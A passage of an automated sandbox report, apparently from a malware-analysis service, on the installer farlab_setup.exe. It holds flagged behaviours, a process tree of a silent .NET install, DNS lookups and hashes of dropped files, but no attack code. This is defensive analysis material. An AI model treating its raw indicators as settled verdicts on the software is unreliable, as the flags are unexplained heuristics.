| Token: SeSyncAgentPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\ac0ba72aca448f27fa5b322872\Setup.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-DE61Q.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DE61Q.tmp\farlab_setup.tmp" /SL5="$30144,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BK3HD.tmp\farlab_setup.tmp" /SL5="$40152,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
C:\ac0ba72aca448f27fa5b322872\Setup.exe
C:\ac0ba72aca448f27fa5b322872\\Setup.exe /q /norestart /x86 /x64 /web
C:\ac0ba72aca448f27fa5b322872\SetupUtility.exe
SetupUtility.exe /screboot
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 247149ADD9C7DCAAE9A3A512F5A4C2C1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F824A4296FD2271DD49196E150CFA791
C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 898166D522C1A15156209C5FDE43B76F M Global\MSI0000
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
C:\Windows\system32\wevtutil.exe
um C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
C:\Windows\system32\wevtutil.exe
im C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2947C24E77B1DB38514D8D99B03C5255 M Global\MSI0000
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\netmemorycache.ini"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\netmemorycache.ini"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.tlb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.tlb"
C:\Windows\system32\wbem\mofcomp.exe
"C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel.mof"
C:\Windows\system32\wbem\mofcomp.exe
"C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel35.mof"
C:\Windows\SysWOW64\wbem\mofcomp.exe
"C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel.mof"
C:\Windows\SysWOW64\wbem\mofcomp.exe
"C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel35.mof"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe" -iru
C:\Windows\system32\wbem\mofcomp.exe
mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru
C:\Windows\SysWOW64\wbem\mofcomp.exe
mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelPerformanceCounters.man"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelPerformanceCounters.man"
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_SMSvcHostPerfCounters.ini"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_SMSvcHostPerfCounters.ini"
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_TransactionBridgePerfCounters.ini"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.ini"
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounters.ini"
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounters.ini"
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_Networkingperfcounters.ini
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_Networkingperfcounters.ini
C:\Windows\system32\lodctr.exe
"C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
C:\Windows\SysWOW64\lodctr.exe
"C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe update /queue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems 1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 130 -InterruptEvent 0 -NGENProcess e8 -Pipe f4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent e8 -InterruptEvent 0 -NGENProcess 190 -Pipe 138 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe update /queue
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe executeQueuedItems 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 144 -InterruptEvent 0 -NGENProcess 104 -Pipe 110 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 104 -InterruptEvent 0 -NGENProcess 1a4 -Pipe 14c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ac -InterruptEvent 0 -NGENProcess 10c -Pipe 1a4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 104 -Pipe 10c -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 1ac -Pipe 104 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 1b0 -Pipe 1ac -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1bc -InterruptEvent 0 -NGENProcess 1b4 -Pipe 1b0 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c0 -InterruptEvent 0 -NGENProcess 1b8 -Pipe 1b4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 0 -NGENProcess 1bc -Pipe 1b8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1bc -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 1c4 -Pipe 1c0 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d0 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 1c4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1cc -Pipe 1c8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1cc -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1d0 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1d4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1dc -Pipe 1d8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1dc -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1e0 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1e4 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 1ec -Pipe 1e8 -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 1f0 -Pipe 1ec -Comment "NGen Worker Process"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 0 -NGENProcess 1f4 -Pipe 1f0 -Comment "NGen Worker Process"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
memory/2552-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/2552-0-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-DE61Q.tmp\farlab_setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1736-8-0x0000000000400000-0x00000000004BD000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-V1FE8.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-V1FE8.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2552-29-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1692-28-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1736-25-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1692-22-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1692-44-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2504-45-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2504-49-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
| MD5 | 2e376eb0b1d34d82196ca36e2af62c9a |
| SHA1 | 9900e6e87d35d98a46ef1e562af7fd0a3cc483fa |
| SHA256 | 7d68d482cbfcabb5aae94131903209271032693317c684d00df5731c8c8f123e |
| SHA512 | a6a4704880cb8df80defd913f070c6e7086e7f8f765dc7c7346dc273eb4b412999462b7c40863bafd9337a5e91199b4a11bc89df97596cda6d2c1d3dea6a3b8b |
memory/2504-63-0x0000000000400000-0x00000000004BD000-memory.dmp
\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
| MD5 | c84209349f18afe5a41ce04e9ae8f487 |
| SHA1 | cedbbf404b166a5e72d035760bcb0fa508e4f4cb |
| SHA256 | 4e49c56e4cf9df2e837a8a3010f5a8b4deb096429d56e7fd9ff70ab394663678 |
| SHA512 | 37006954e3afe07fb02d24894cc34794618b78c27a1b514818985b6cc1fa3e896ed99ba2e4aac3f6469d263819bd94ee70e7113946c51ba83c93b74826fc8fa8 |
memory/1692-78-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2504-75-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/664-104-0x0000000000080000-0x00000000000CC000-memory.dmp
\ac0ba72aca448f27fa5b322872\Setup.exe
| MD5 | 40d87630ef1364a3dc4fd3387212c77d |
| SHA1 | 2ab844ca20815c51960ac5d1d75e93897c9f2df2 |
| SHA256 | a9d2cc918999858aa1e500a8fbc919b6397da6b44b666e3fc0edd38920748212 |
| SHA512 | d81f1e80186f3c9c78a45c235f30da9e6f5cd3ca1f6b153892a1c53decc350b7a5f4f9924f59ab83dc20c31acad783faeebbcb67c9419f74628da6459530c9d3 |
C:\ac0ba72aca448f27fa5b322872\SetupEngine.dll
| MD5 | 4c0b492d3e96d742ba8922912976b3f8 |
| SHA1 | ee571ea60f3bb2feea2f7a5ff0d02cc7d7524b6e |
| SHA256 | c40f60ab16752e404cae3943f169d8260ad83f380e0c2bd363ad165982608f3e |
| SHA512 | 99e44ffa8b50fbfa378310198582404a4f90b2450677b1f152baa55c6e213fbb5fbd31d0207a45876a57837e2a5d642bd613843e77f9f70b0d842d8bcdf0cfad |
C:\ac0ba72aca448f27fa5b322872\sqmapi.dll
| MD5 | 6404765deb80c2d8986f60dce505915b |
| SHA1 | e40e18837c7d3e5f379c4faef19733d81367e98f |
| SHA256 | b236253e9ecb1e377643ae5f91c0a429b91c9b30cca1751a7bc4403ea6d94120 |
| SHA512 | a5ff302f38020b31525111206d2f5db2d6a9828c70ef0b485f660f122a30ce7028b5a160dd5f5fbcccb5b59698c8df7f2e15fdf19619c82f4dec8d901b7548ba |
C:\ac0ba72aca448f27fa5b322872\DHTMLHeader.html
| MD5 | cd131d41791a543cc6f6ed1ea5bd257c |
| SHA1 | f42a2708a0b42a13530d26515274d1fcdbfe8490 |
| SHA256 | e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb |
| SHA512 | a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a |
C:\Users\Admin\AppData\Local\Temp\HFI40A9.tmp.html
| MD5 | 8a46ff31ea96965f3be636108705e9c9 |
| SHA1 | 81a396aa705beb26b0cc7bcdbc2347c1267e5d5b |
| SHA256 | fed146e20f86795af7d3103719c32f90dc400d48942eadede2c68d7537ac23a3 |
| SHA512 | f2c2df9280f4e0221c89cd44671b96b6d089b7e64735d2d2b9f2f061f9db6de198838df7afc635e02edc1b038da70aecb7f33404fd35047bba6d81069f22e8d6 |
memory/664-302-0x0000000000440000-0x000000000044A000-memory.dmp
C:\ac0ba72aca448f27fa5b322872\ParameterInfo.xml
| MD5 | 3ac6a8f0fe4aa7fb0ffe21b548abacbb |
| SHA1 | 5e30d7d1057a9e8a8732ad67d672ca7a608657ef |
| SHA256 | 68d6fcfd5f2986206763e1b49b86997c94a51260e4f9c02b8037aa5cf3c03142 |
| SHA512 | e5bff3554f4dd149e7b1bc3f5eae5d234a7e22e69f3e0d210a67511cf85bb9ce4c3a787a91af89b9d5f2ec91be62719312921716baf29d1f81571b8b2a6e6834 |
C:\ac0ba72aca448f27fa5b322872\UiInfo.xml
| MD5 | c99059acb88a8b651d7ab25e4047a52d |
| SHA1 | 45114125699fa472d54bc4c45c881667c117e5d4 |
| SHA256 | b879f9bc5b79349fa7b0bdbe63167be399c5278454c96773885bd70fbfe7c81d |
| SHA512 | b23a7051f94d72d5a1a0914107e5c2be46c0ddee7ca510167065b55e2d1cb25f81927467370700b1cc7449348d152e9562566de501f3ea5673a2072248572e3b |
C:\ac0ba72aca448f27fa5b322872\1029\LocalizedData.xml
| MD5 | eae0498ea94f2a7e7982ee773d10d3a5 |
| SHA1 | f0bc4a900f0eefd362760b77b7cc1829ac0bb93e |
| SHA256 | 309dac84e7aef6b4cca2cd7b1eeef8a30bd910373724ca56e8764fa3b420aa79 |
| SHA512 | 978b97cb7c8274ed73063c1f9a9bce4d9c0fd9c186de67d2ce3b03d33dd88487b6f480eea481fe9c3687c3008a5403b85a16ba57072ac03baee1ffe1c14fb6e7 |
C:\ac0ba72aca448f27fa5b322872\1028\LocalizedData.xml
| MD5 | 5727d5160e0fb5d661eb4e6720430d1b |
| SHA1 | b3b6ba3fda17ca68a20675ae06b3c56d576274b4 |
| SHA256 | 0ad12bf18aa4fcc557ab9422ebef07ab0b8369395bcf695f0915ea99c689f99f |
| SHA512 | 7f0314a621137e4076f4ea22e82a6845912fae3b002ba4455952c683e6be89e5a3de4a7cd8f4df2a360247923ca472a53619a2d3635cdcfc1c66e03e7aac2a31 |
